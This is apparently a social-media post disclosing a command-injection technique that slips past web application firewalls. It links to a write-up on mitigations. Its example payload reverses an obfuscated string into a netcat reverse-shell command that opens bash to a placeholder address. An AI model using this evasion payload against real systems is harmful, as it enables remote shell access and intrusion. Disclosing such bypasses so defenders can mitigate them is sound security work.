A command injection WAF bypass method discovered by Picus Labs researcher @evrnyalcin.
It uses “”rev”” and “”printf”” commands in command substitution.
Example: $(printf ‘hsab/nib/ e- 4321 1.0.0.721 cn’|rev)
Read the write-up for details and mitigations: https://t.co/5A5Ntf3hvS